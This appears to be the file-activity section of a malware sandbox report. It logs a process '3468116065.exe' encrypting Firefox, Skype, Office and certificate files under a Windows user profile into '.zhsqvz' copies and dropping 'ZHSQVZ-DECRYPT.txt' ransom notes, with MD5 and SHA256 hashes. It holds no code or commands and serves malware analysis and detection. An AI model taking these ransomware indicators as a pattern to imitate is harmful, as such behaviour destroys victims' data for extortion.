C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4.zhsqvz
binary
MD5: 3547f6cb2fad88d25c6b7d31ea16d688
SHA256: 31743abc65f8216de206eedd4fcb758b291ab8cbf1c9d0ae0973c65abffe9123
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4.zhsqvz
gpg
MD5: 093426a887ceb4cbe1b9e3ed6f26189c
SHA256: 366fcf33ad3804a6d10e065a2614e2c0273199ba1f3d4ceff1a294406b2f0116
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4.zhsqvz
binary
MD5: 7ae6376d9a8a3f68bfc9ec9b58494a15
SHA256: 0657f8088abc491ec56e91590e7cfd0458f1d1ccb94d63c39423f2b40f19250f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4.zhsqvz
binary
MD5: 842da81209886db04d271a2b6ec735ce
SHA256: 6fec9c2d32d59f63a82386ba91f5e1c27c69798b537430ee8f0de30fa3d6bf05
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4.zhsqvz
binary
MD5: e31067b87ade2a6775b9f9a554e6a47a
SHA256: 6f36f5f2477a3d2ab17a608e1a2efa1d2e946f3b860d6773c0c1aa135481981c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4.zhsqvz
binary
MD5: b880da7bd86786b1870313d1be7468be
SHA256: 105adcd8672d0723c851e8faeaac71a8800682b28fdb37fe19a681d69c665b40
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4.zhsqvz
binary
MD5: aca31fa3577650beaa0f9cf67bb6e89b
SHA256: 57b83228ea47c2fb920a6d80eab04d70e50d31de2b8c3ed566f7cbcf9979554b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4.zhsqvz
binary
MD5: 5035450fd6708b6c8de5fa17d60aa889
SHA256: 43688b9db0a29cdfa4730a1e8f32d0717fa040b7b57cc9353ea009386d03df85
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\events\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite.zhsqvz
binary
MD5: 7e3d4c7e4ba57945a57d9b6f448b81fa
SHA256: e6c48866fa18a2c2cf2e8c8647eec25ae0f072c9b42596329b5132c68b4a0acb
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite.zhsqvz
binary
MD5: 8953b99c7469183c1138e2dcb6302d05
SHA256: 64ad0242fcff0fa67107680b08035657810698164a399ffef3444007e9535d25
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\content-prefs.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini.zhsqvz
binary
MD5: 2f0bf2d3eb7702bd04060b46d4e79549
SHA256: 210925bf3574e8861030267bf3b29593e57268152b0cb9fd9f723974ad13ea4c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db.zhsqvz
binary
MD5: 13d6f604569747abe01d7a20e0e4625a
SHA256: 49813d2edc14f51c8fb85a713029cac9f198574f5e721ccd485eacd9a250b978
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json.zhsqvz
binary
MD5: b1090c6ff5be49bd454a3d2b99b4fc78
SHA256: 33f1bf25af0048ff1ee3e53b84c0b2eebfdaa105cc2555866d3524e6d498e717
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\compatibility.ini
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cert9.db
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\containers.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json.zhsqvz
binary
MD5: b7a7074dce0b6c1f575888b783da1305
SHA256: 1ead41b70485190fdac2d13c58cfd89f0a805787acd6bfb2198600ab21052015
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4.zhsqvz
binary
MD5: f2695678aaf28793a9556c6237548b2d
SHA256: 0004eafdd213283471ac4a897c97ac8561f94d0eb1724ef6800821b7e1e3ca1c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\bookmarkbackups\bookmarks-2018-08-28_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\plugins.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json.zhsqvz
binary
MD5: e87c04cdba30a0ebaa9452cf7bf8bb4e
SHA256: e4b4107a00522ba0c47739ff09d32ebaace784378b168d223ca0c0ff03ffe4cd
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\addons.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml.zhsqvz
binary
MD5: cd752256e8523f1efb7b556188ec6153
SHA256: 5ac1234e7b97b626f34af5f9544d75bd87a8d62b28d158fbb77f193cd86a3271
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4.zhsqvz
binary
MD5: 50f398b56c113d5914033533ad06473b
SHA256: f42518adb6bf34b08c87245a9de5c6ae630aa0b7d0f4254ce3c82cd4461e6951
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklists\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addonStartup.json.lz4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\blocklist.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231.zhsqvz
binary
MD5: f2d9c991b1297b90da1e21b46e5e512f
SHA256: fbfe1b8f8acdaeb35d7fdcd7829db836485f4a2a2dc093959ddd8260a2d5f193
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Pending Pings\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json.zhsqvz
binary
MD5: 5eb0974fdb7607246ff20ee32d11de53
SHA256: bd4b507ec2e3a64716a3f05f169d71bb718090fd3fcdcfe5db67201b5e9d9d06
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20180807170231
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\addons.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.zhsqvz
binary
MD5: 03e3ba36942ea9be2ca244a1619ee02d
SHA256: 67d39bdf597cc5399853ba1021200eefc17c44a3667461d3d8d1e35836f27385
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Extensions\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Vault\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm.zhsqvz
binary
MD5: cc4226b49de907b92d5fa2e6e0e7d815
SHA256: ebc310f4b8c115feecaed78143f7389ed24af419d58a8ebb40b07886d50b219f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\UProof\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm.zhsqvz
binary
MD5: 4d2bc477f3ea3f1fbc3c33abfb372f55
SHA256: 1e507f45b823e0325f83b759bde0e637059c23ebb4322b8378f925be4361f781
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\1033\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Access Parts\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4.zhsqvz
binary
MD5: f8e9049fe751dddc2112c22880eb35ac
SHA256: 7a3f3203d6e85fce9a2bae2750e0e5e53714916a1f7c6d8ecc0e2bb22030a0cb
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70.zhsqvz
binary
MD5: 7df41b4373c2b1a50b54eef1f34d21d4
SHA256: 591bda2719460817f9fa8b4f413532052fda7333e37f2935dd9c2c621a89ef97
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\ECCD4BA46722CB4F92060701865DDF09D8AF68B4
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Stationery\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog.zhsqvz
binary
MD5: 8e16186f2d330d73c73bff93ceb2d28d
SHA256: 55d5af5f76a0c2a4552bddc78f77e96e4797d48e68db059aea1738e9c2389281
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml.zhsqvz
binary
MD5: fb7bf586fd2a81feba57714ff5139d65
SHA256: 180c01b6dc074828c85af1500accfadea61b2a43b6f4052c5b1fe5c2471893c6
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Speech\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\slimcore-0-4223384469.blog
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\shared.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db.zhsqvz
binary
MD5: f20b79cab027d400eebe0d6c8cff6b4d
SHA256: e9410d98fe013da32a3e2f2d997a150bbf3cdab422702c70a995aa689659f15f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal.zhsqvz
binary
MD5: 307607dceab0f9fcad9751f076c12ad9
SHA256: 0818b57b19518834e1fc1611356348a6c435ef40c97ee3fa8075ed892e64b3ec
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db-journal
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\main.db
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal.zhsqvz
binary
MD5: 55080a39a0294e33c31c10f0bbabc6e0
SHA256: a93d67829e019af4b965b7cb4f9a9dfbdefe93581df129c6ae8ff6a17dff2ead
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml.zhsqvz
binary
MD5: af1bf4de4216b9e8397234617c8f1c53
SHA256: 11bb3074ed6a1f4131020dbfdb13f2d9bd26ade22fee741e8f3607b6d9a39e6a
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\live#3agabriel.radrigos\config.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-wal
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data.zhsqvz
binary
MD5: dfd48a50ba098695d1b43f89a086c183
SHA256: 1fdb4d618aa11969cceb4cc40a15dddeae6b0d9bfd46a470866ddf57da36d6e6
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm.zhsqvz
binary
MD5: adbb809e515b380d37b520d6521f8f60
SHA256: e7cc66c025ade4efd61f8c1439d2fae69bd47f09db431a5afaf7a30dab66fdf8
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json.zhsqvz
flc
MD5: 25b2bf6a5872c36c114a784f24e9d2cc
SHA256: 0cd310ba8622488b96f1548330f8888d529bedb4e80159d496eef9c633419539
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data-shm
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\skylib\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager.zhsqvz
binary
MD5: 8e0d04df6953fe0e6b806b07f861d063
SHA256: ce96211b1c12303ab677fbe2670bce621c9cceebb7de40b87a47fce6c14b1f26
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\QuotaManager
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak.zhsqvz
binary
MD5: e6940a9dcd8f81b917c1893640efc441
SHA256: a53693f44d53ff43121538d5ef7b8baede2f2eb79127c01b939c7572bbc51ee6
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences.zhsqvz
binary
MD5: e018d896643a31248f1cfedba87bb5b7
SHA256: 49215fb286fb5bc97da3e4fef133952107e627930aaea83c287ae548fcb6af86
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.bak
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Preferences
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl.zhsqvz
binary
MD5: 868e799a67bee72737c8941acbfff267
SHA256: c57d578c7d7899de441bc7b7bd3113fdbe4817680e26109415326563b83721ed
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog.zhsqvz
binary
MD5: 499b81268e585f09e785fc1394223542
SHA256: 905603512e2edfe919cdd90c2d12cf3d7987554450b67b018c5b254d8da242ca
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype_MediaStackETW-2018.34.1.3-UVA-x86release-U.etl
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
